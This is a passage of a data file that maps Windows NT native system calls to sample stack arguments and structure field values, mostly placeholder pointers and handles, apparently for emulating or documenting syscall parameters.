"NtGetCompleteWnfStateSubscription": { "ntFunc": "NtGetCompleteWnfStateSubscription", "pushes": [ { "value": "0x00000030", "additionalComment": "DescriptorSize (typical size value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to NewDeliveryDescriptor (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "OldDescriptorStatus (0, default/unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "OldDescriptorEventMask (0, default/unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to ULONG OldSubscriptionId (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0080", "additionalComment": "Pointer to WNF_STATE_NAME OldDescriptorStateName (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xaabbccdd" } ], "structures": {} }, "NtGetContextThread": { "ntFunc": "NtGetContextThread", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to CONTEXT structure (dummy pointer)", "structurePointer": "CONTEXT", "structureRef": "struct94", "structureValueExpectations": "Thread context structure for receiving thread state.", "pointedValue": None }, { "value": "0x00000abc", "additionalComment": "HANDLE ThreadHandle (dummy thread handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct94": { "type": "CONTEXT", "fields": [ { "fieldName": "ContextFlags", "fieldType": "ULONG", "fieldValue": "0x00010007", "fieldComment": "CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS" }, { "fieldName": "Eip", "fieldType": "ULONG", "fieldValue": "0x00401000", "fieldComment": "Instruction pointer" }, { "fieldName": "Esp", "fieldType": "ULONG", "fieldValue": "0x0012ffb0", "fieldComment": "Stack pointer" }, { "fieldName": "Eax", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "General purpose register" } ] } } }, "NtGetCurrentProcessorNumber": { "ntFunc": "NtGetCurrentProcessorNumber", "pushes": [], "structures": {} }, "NtGetCurrentProcessorNumberEx": { "ntFunc": "NtGetCurrentProcessorNumberEx", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for optional PULONG ProcessorNumber parameter", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetDevicePowerState": { "ntFunc": "NtGetDevicePowerState", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PDEVICE_POWER_STATE State (output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000DEAD", "additionalComment": "HANDLE DeviceHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtImpersonateAnonymousToken": { "ntFunc": "NtImpersonateAnonymousToken", "pushes": [ { "value": "0x0000BEEF", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtInitializeRegistry": { "ntFunc": "NtInitializeRegistry", "pushes": [ { "value": "0x00000001", "additionalComment": "Options = 1 (e.g., INITREG_CREATE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtInitiatePowerAction": { "ntFunc": "NtInitiatePowerAction", "pushes": [ { "value": "0x00000001", "additionalComment": "Asynch = TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Flags = 0 (no special flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "SYSTEM_POWER_STATE = PowerSystemSleeping1 (S1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "POWER_ACTION = PowerActionSleep", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtIsSystemResumeAutomatic": { "ntFunc": "NtIsSystemResumeAutomatic", "pushes": [], "structures": {} }, "NtLoadKeyEx": { "ntFunc": "NtLoadKeyEx", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "CallbackReserved (None, reserved parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ObjectContext (None, reserved parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Reserved (None, reserved parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "TrustClassKey (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Flags (0, default flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES SourceFile (None, not used in this example)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Optional OBJECT_ATTRIBUTES for source file. None if not used.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES TargetKey (None, not used in this example)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "OBJECT_ATTRIBUTES for target key. None if not used.", "pointedValue": None } ], "structures": {} }, "NtLockProductActivationKeys": { "ntFunc": "NtLockProductActivationKeys", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG SafeMode (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Pointer to ULONG ProductBuild (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtLockRegistryKey": { "ntFunc": "NtLockRegistryKey", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE KeyHandle (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtMakePermanentObject": { "ntFunc": "NtMakePermanentObject", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE Object (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtManageHotPatch": { "ntFunc": "NtManageHotPatch", "pushes": [ { "value": "0x00000000", "additionalComment": "Unknown parameter, commonly None", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "Unknown ULONG, sample nonzero value", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to ULONGLONG (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x0000000000000002" }, { "value": "0x00000010", "additionalComment": "Unknown ULONG, sample value", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtMapCMFModule": { "ntFunc": "NtMapCMFModule", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Optional pointer to pointer to mapped module (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0xbadd0020", "additionalComment": "Optional pointer to ULONG (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0xbadd0030", "additionalComment": "Optional pointer to ULONG (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0040", "additionalComment": "Optional pointer to ULONG (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000002", "additionalComment": "ULONG Index, sample value", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG What, sample value", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtModifyBootEntry": { "ntFunc": "NtModifyBootEntry", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to BOOT_ENTRY (dummy pointer)", "structurePointer": "BOOT_ENTRY", "structureRef": "struct95", "structureValueExpectations": "Boot entry structure with identifier, attributes, and file path.", "pointedValue": None } ], "structures": { "struct95": { "type": "BOOT_ENTRY", "fields": [ { "fieldName": "Version", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Boot entry version" }, { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000100", "fieldComment": "Size of BOOT_ENTRY" }, { "fieldName": "Id", "fieldType": "ULONG", "fieldValue": "0x00000010", "fieldComment": "Boot entry identifier" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Sample attribute flags" }, { "fieldName": "FriendlyNameOffset", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "Offset to friendly name" }, { "fieldName": "BootFilePathOffset", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "Offset to boot file path" } ] } } }, "NtModifyDriverEntry": { "ntFunc": "NtModifyDriverEntry", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to DRIVER_ENTRY (dummy pointer)", "structurePointer": "DRIVER_ENTRY", "structureRef": "struct96", "structureValueExpectations": "Driver entry structure with version, flags, and service name.", "pointedValue": None } ], "structures": { "struct96": { "type": "DRIVER_ENTRY", "fields": [ { "fieldName": "Version", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Driver entry version" }, { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000080", "fieldComment": "Size of DRIVER_ENTRY" }, { "fieldName": "Id", "fieldType": "ULONG", "fieldValue": "0x00000005", "fieldComment": "Driver entry identifier" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Sample attribute flags" }, { "fieldName": "ServiceNameOffset", "fieldType": "ULONG", "fieldValue": "0x00000010", "fieldComment": "Offset to service name" } ] } } }, "NtNotifyChangeDirectoryFileEx": { "ntFunc": "NtNotifyChangeDirectoryFileEx", "pushes": [ { "value": "0x00000001", "additionalComment": "DIRECTORY_NOTIFY_INFORMATION_CLASS, e.g., DirectoryNotifyInformationClassBasic", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN WatchTree, TRUE", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000010A", "additionalComment": "ULONG CompletionFilter, e.g., FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_DIR_NAME", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Length, sample buffer size", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct97", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to APC context (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00A0", "additionalComment": "Pointer to IO_APC_ROUTINE (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE Event (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000333", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct97": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Operation-specific information" } ] } } }, "NtNotifyChangeMultipleKeys": { "ntFunc": "NtNotifyChangeMultipleKeys", "pushes": [ { "value": "0x00000000", "additionalComment": "Asynchronous = FALSE (synchronous operation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "BufferSize = 4096 bytes (typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Buffer = None (no output buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "WatchTree = TRUE (monitor subkeys recursively)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "CompletionFilter = REG_NOTIFY_CHANGE_LAST_SET", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct98", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ApcContext = None (no APC context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ApcRoutine = None (no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Event = None (no event handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "SubordinateObjects = None (no subordinate OBJECT_ATTRIBUTES)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "Count = 1 (monitoring one key)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "MasterKeyHandle (dummy handle value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct98": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No information yet" } ] } } }, "NtOpenKeyEx": { "ntFunc": "NtOpenKeyEx", "pushes": [ { "value": "0x00000000", "additionalComment": "OpenOptions = 0 (default options)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct99", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00020019", "additionalComment": "DesiredAccess = KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE KeyHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct99": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0070", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenKeyedEvent": { "ntFunc": "NtOpenKeyedEvent", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct100", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "DesiredAccess = EVENT_ALL_ACCESS", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE KeyedEventHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct100": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0080", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenRegistryTransaction": { "ntFunc": "NtOpenRegistryTransaction", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct101", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F003F", "additionalComment": "DesiredAccess = TRANSACTION_ALL_ACCESS", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to HANDLE RegistryHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct101": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0090", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtPlugPlayControl": { "ntFunc": "NtPlugPlayControl", "pushes": [ { "value": "0x00001000", "additionalComment": "BufferSize = 4096 bytes (typical size for device info)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Buffer = None (no buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000000D", "additionalComment": "Class = PlugPlayControlEnumerateDevice (example class value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtPssCaptureVaSpaceBulk": { "ntFunc": "NtPssCaptureVaSpaceBulk", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to SIZE_T ReturnLength (dummy pointer, may be None if not needed)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00002000", "additionalComment": "Length (SIZE_T), e.g., 8 KB", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to output Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00405000" }, { "value": "0x00400000", "additionalComment": "BaseAddress (PVOID), e.g., start of region", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryAuxiliaryCounterFrequency": { "ntFunc": "NtQueryAuxiliaryCounterFrequency", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONGLONG lpAuxiliaryCounterFrequency (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x000F4240" } ], "structures": {} }, "NtQueryDebugFilterState": { "ntFunc": "NtQueryDebugFilterState", "pushes": [ { "value": "0x00000002", "additionalComment": "ULONG Level (e.g., 2 = warning)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Component (e.g., 1 = default component)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationByName": { "ntFunc": "NtQueryInformationByName", "pushes": [ { "value": "0x00000005", "additionalComment": "FILE_INFORMATION_CLASS FileInformationClass (e.g., FileStandardInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000100", "additionalComment": "ULONG Length (256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to FileInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00406000" }, { "value": "0xbadd0040", "additionalComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct102", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": { "struct102": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name specified)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryInstallUILanguage": { "ntFunc": "NtQueryInstallUILanguage", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG LanguageId (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000409" } ], "structures": {} }, "NtQueryLicenseValue": { "ntFunc": "NtQueryLicenseValue", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnedLength (dummy pointer, will receive length of value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ULONG Length (buffer size in bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer (dummy pointer, will receive value data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG Type (dummy pointer, will receive value type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0030", "additionalComment": "Pointer to UNICODE_STRING Name (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct103", "structureValueExpectations": "UNICODE_STRING describing the license value name.", "pointedValue": None } ], "structures": { "struct103": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0100", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtQueryOpenSubKeys": { "ntFunc": "NtQueryOpenSubKeys", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG HandleCount (dummy pointer, will receive count)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000002" }, { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES TargetKey (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct104", "structureValueExpectations": "OBJECT_ATTRIBUTES describing the registry key.", "pointedValue": None } ], "structures": { "struct104": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0110", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryOpenSubKeysEx": { "ntFunc": "NtQueryOpenSubKeysEx", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer, will receive length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0xbadd0070", "additionalComment": "Pointer to buffer (dummy pointer, will receive subkey info)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000020", "additionalComment": "ULONG BufferLength (size of buffer in bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to OBJECT_ATTRIBUTES TargetKey (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct105", "structureValueExpectations": "OBJECT_ATTRIBUTES describing the registry key.", "pointedValue": None } ], "structures": { "struct105": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0120", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryPortInformationProcess": { "ntFunc": "NtQueryPortInformationProcess", "pushes": [], "structures": {} }, "NtQuerySecurityPolicy": { "ntFunc": "NtQuerySecurityPolicy", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to ULONG Subsystem (dummy pointer, will receive subsystem value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd00a0", "additionalComment": "Pointer to BOOLEAN Enabled (dummy pointer, will receive enabled flag)", "structurePointer": None, "structureRef": None, 